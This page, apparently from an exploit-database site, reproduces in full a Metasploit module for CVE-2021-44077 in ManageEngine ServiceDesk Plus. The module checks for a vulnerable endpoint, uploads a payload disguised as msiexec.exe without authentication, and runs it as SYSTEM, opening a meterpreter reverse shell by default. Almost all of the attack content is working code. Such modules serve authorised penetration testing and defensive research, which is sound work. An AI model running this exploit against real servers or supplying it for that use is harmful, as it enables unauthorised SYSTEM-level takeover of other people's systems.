ManageEngine ServiceDesk Plus Remote Code Execution

2021.12.30
Credit: wvu
Risk: High
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077', 'Description' => %q{ This module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build. }, 'Author' => [ # Discovered by unknown threat actors 'wvu', # Analysis and exploit 'Y4er' # Additional confirmation ], 'References' => [ ['CVE', '2021-44077'], ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'], ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'], ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'], ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'], ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'], ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup ], 'DisclosureDate' => '2021-09-16', 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ ['Windows Dropper', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8080, 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians') ) unless res return CheckCode::Unknown('Target failed to respond to check.') end # NOTE: /RestAPI/ImportTechnicians was removed after build 11303 unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]') return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.') end CheckCode::Appears('/RestAPI/ImportTechnicians is present.') end def exploit upload_msiexec execute_msiexec end def upload_msiexec print_status('Uploading msiexec.exe') form = Rex::MIME::Message.new form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"') form.add_part(generate_payload_exe, 'application/octet-stream', 'binary', 'form-data; name="theFile"; filename="msiexec.exe"') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'), 'ctype' => "multipart/form-data; boundary=#{form.bound}", 'data' => form.to_s ) unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title') fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe') end print_good('Successfully uploaded msiexec.exe') end def execute_msiexec print_status('Executing msiexec.exe') # This endpoint "won't" return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'), 'vars_post' => { 'execute' => 's247AgentInstallationProcess' } }, 0) end # XXX: FileDropper dies a miserable death if the file is in use def on_new_session(_session) super # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7 print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top